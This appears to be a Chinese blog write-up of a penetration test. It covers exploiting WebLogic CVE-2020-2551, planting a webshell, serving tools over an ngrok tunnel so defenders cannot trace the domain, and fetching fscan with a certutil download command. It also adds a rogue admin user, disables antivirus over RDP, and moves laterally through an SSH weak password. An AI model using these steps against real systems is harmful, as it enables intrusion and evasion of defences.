news 2026/6/3 15:50:25

渗透测试实战—高权限shell碰上杀毒软件,会发生什么?

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
渗透测试实战—高权限shell碰上杀毒软件,会发生什么?

免责声明:文章来源于真实渗透测试,已获得授权,且关键信息已经打码处理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

前言

主要记录一次获取高权限用户的shell后如何直面杀毒软件上传工具,并继续进行内网信息收集和横向工作,从而进一步扩大战果的实战记录。也推荐一下在本文中使用到的一个反向代理工具 ——Ngrok,文中我利用该工具在没有使用肉机和VPS的情况下便完成了本次渗透测试工作。

一、漏洞利用

信息收集的时候发现隐藏的资产,进行指纹识别使用了Weblogic中间件。随便访问一个不存在的目录,产生报错,很明显Weblogic的特征,直接上工具扫描漏洞。

运气也是相当好的,确实存在漏洞(CVE_2020_2551),并且获取的是Administrator的用户权限。

继续利用工具写入内存马,通过哥斯拉进行控制,成功连接webshell。

二、Ngrok工具

拿到webshell后,我便想尝试利用shell下载内网信息收集工具从而继续进行渗透工作。这里就用到了我说的Ngrok工具。这是一个反向代理工具,它能够创建一个安全的隧道,将本地服务器映射到互联网上。

先利用Python在存放内网工具的目录下启动HTTP服务器,记得要确保HTTP服务器开启了目录浏览功能

接着,就是利用Ngrok工具将内网的HTTP服务映射出去,而映射的端口就是刚刚Python启动HTTP服务的端口。命令也是很简单,输入后直接回车就能成功将本地的HTTP服务映射出去,并且获取了一个临时的域名。

而且因为是临时的域名,关闭工具和服务后域名也就没有了,这也就使得防守方难以通过域名进行溯源。


直接访问临时域名就可以浏览目录内容了,如果访问下载目录内工具,在命令终端也会显示信息,可以由此看出是否成功下载。(Ngrok工具初次使用时是需要进行配置的,配置之后就可以像文中步骤一样使用,建议大家自行查询一下Ngrok使用方法)

三、直面杀毒软件

尝试利用curl或wget下载信息收集工具,但是测试发现该系统没有curl和wget这两个工具。这时我就想到了windows中的另一个默认自带的工具 ——certutil,本来该工具是用来处理与证书相关的操作的,但是利用特殊的命令一样能起到下载文件的作用。

certutil -urlcache -f -split http://…

可以看到我确实成功下载了 fscan 工具,但是一运行就报错。查看后发现fscan没了,这服务器肯定是有杀软的,而工具做了静态免杀。懒得再搞免杀绕过了,既然是Administrator用户,那直接远程连接到桌面关掉杀软就好了。

利用命令行添加 test 用户,并将该用户加入到管理员组中。

查看端口开放情况发现开放了3389,那就不用再开启RDP服务了。直接利用哥斯拉插件写入Suo5内存马,利用工具搭建正向代理。

确认正向代理搭建成功后,直接用远程桌面连接工具连接内网地址进行登录,成功登录到刚刚创建的test用户。

在登录后,直接手动关闭杀毒软件,并再次上传工具。这次就没有问题了,工具成功上传,也没有再被杀掉。

四、内网横向

利用fscan扫描内网,分析发现应该是一个内网小集群。机器不是很多,但也依然发现了不少有用的信息。通过fscan的扫描获取到了一台服务器的SSH弱口令;同时,内网中也存在另一台同样使用了Weblogic中间件的服务器。

利用SSH弱口令远程登录到服务器,成功获得root用户权限。通过查看.bash_history文件,发现该服务器通过防火墙开放了1521端口,猜测该服务器上可能存在Oracle数据库,可惜因为网络和时间问题没有继续进行测试。

使用漏洞利用工具对新发现的存在Weblogic中间件的服务器进行扫描,也是存在一个Weblogic的低版本漏洞,并成功获得Administrator用户权限。

总结

成功获取了两台Windows主机的Administrator用户权限,一台Linux主机的root用户权限。

本次渗透到是没有什么难度,但在这个过程中也是出现了一些问题。在搭建正向代理后,习惯性利用ping进行网络连通性测试,但是就是一直ping不通该服务器的内网IP地址,这一度让我以为根本没有代理成功。但是经过多次测试后,发现是服务器防火墙策略禁ping了,也是第一次在实际的渗透测试内网环境中遇到这种情况。还是那个话,还是需要多实战,多思考。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取


版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/1 14:41:17

高性能中文NER解决方案|AI智能实体侦测服务技术详解

高性能中文NER解决方案|AI智能实体侦测服务技术详解 在信息爆炸的时代,非结构化文本数据(如新闻、社交媒体、文档)占据了企业数据总量的80%以上。如何从中高效提取关键信息,成为构建智能系统的核心挑战之一。命名实体…

作者头像 李华
网站建设 2026/5/30 14:27:42

单目视觉技术:MiDaS模型原理与实战应用

单目视觉技术:MiDaS模型原理与实战应用 1. 引言:AI 单目深度估计 —— 让2D图像“看见”3D世界 在计算机视觉领域,深度估计是实现三维空间感知的关键一步。传统方法依赖双目立体视觉或多传感器融合(如LiDAR)&#xf…

作者头像 李华
网站建设 2026/6/1 5:33:15

Rembg抠图部署指南:多语言支持的实现

Rembg抠图部署指南:多语言支持的实现 1. 智能万能抠图 - Rembg 在图像处理与内容创作领域,精准、高效的背景去除技术一直是核心需求。无论是电商商品图精修、社交媒体内容制作,还是AI生成内容(AIGC)中的素材准备&…

作者头像 李华
网站建设 2026/5/30 14:28:44

MiDaS模型部署教程:CPU环境下实现高精度单目深度估计

MiDaS模型部署教程:CPU环境下实现高精度单目深度估计 1. 引言 1.1 AI 单目深度估计 —— 让2D图像“看见”3D世界 在计算机视觉领域,单目深度估计(Monocular Depth Estimation) 是一项极具挑战性但又极具应用价值的技术。它旨在…

作者头像 李华
网站建设 2026/5/30 15:21:43

MiDaS模型应用案例:电商产品3D展示效果实现

MiDaS模型应用案例:电商产品3D展示效果实现 1. 引言:AI 单目深度估计如何赋能电商视觉升级 在当前电商竞争日益激烈的环境下,商品展示方式直接影响用户的购买决策。传统的2D图片难以传达产品的空间感和立体结构,而专业3D建模成本…

作者头像 李华
网站建设 2026/5/30 4:44:34

MiDaS应用开发:基于WebSocket的实时深度流

MiDaS应用开发:基于WebSocket的实时深度流 1. 引言:AI 单目深度估计的现实意义 在计算机视觉领域,从单张2D图像中恢复3D空间结构一直是极具挑战性的任务。传统方法依赖多视角几何或激光雷达等硬件支持,成本高且部署复杂。近年来…

作者头像 李华